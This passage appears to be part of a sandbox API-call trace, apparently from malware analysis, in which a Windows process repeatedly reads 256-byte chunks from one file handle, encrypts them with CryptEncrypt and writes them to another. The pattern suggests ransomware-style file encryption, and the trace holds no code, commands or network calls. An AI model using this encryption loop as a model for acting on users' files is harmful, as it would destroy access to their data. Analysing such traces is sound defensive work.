dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.501] GetLastError () returned 0x0 [0170.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.502] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.502] GetLastError () returned 0x0 [0170.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.502] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.502] GetLastError () returned 0x0 [0170.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.502] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.502] GetLastError () returned 0x0 [0170.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.502] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.502] GetLastError () returned 0x0 [0170.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.503] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.503] GetLastError () returned 0x0 [0170.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.503] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.503] GetLastError () returned 0x0 [0170.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.503] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.503] GetLastError () returned 0x0 [0170.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.503] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.504] GetLastError () returned 0x0 [0170.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.504] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.504] GetLastError () returned 0x0 [0170.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.504] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.504] GetLastError () returned 0x0 [0170.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.505] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.505] GetLastError () returned 0x0 [0170.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.505] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.505] GetLastError () returned 0x0 [0170.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.505] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.505] GetLastError () returned 0x0 [0170.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.505] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.505] GetLastError () returned 0x0 [0170.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.506] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.506] GetLastError () returned 0x0 [0170.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.506] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.506] GetLastError () returned 0x0 [0170.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.506] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.506] GetLastError () returned 0x0 [0170.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.506] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.507] GetLastError () returned 0x0 [0170.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.507] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.507] GetLastError () returned 0x0 [0170.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.507] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.507] GetLastError () returned 0x0 [0170.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.507] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.507] GetLastError () returned 0x0 [0170.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.507] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.507] GetLastError () returned 0x0 [0170.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.507] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.507] GetLastError () returned 0x0 [0170.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.508] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.508] GetLastError () returned 0x0 [0170.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.508] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.508] GetLastError () returned 0x0 [0170.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.508] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.508] GetLastError () returned 0x0 [0170.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.508] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.508] GetLastError () returned 0x0 [0170.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.508] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.508] GetLastError () returned 0x0 [0170.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.509] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.509] GetLastError () returned 0x0 [0170.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.509] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.509] GetLastError () returned 0x0 [0170.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.509] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.509] GetLastError () returned 0x0 [0170.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.509] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, 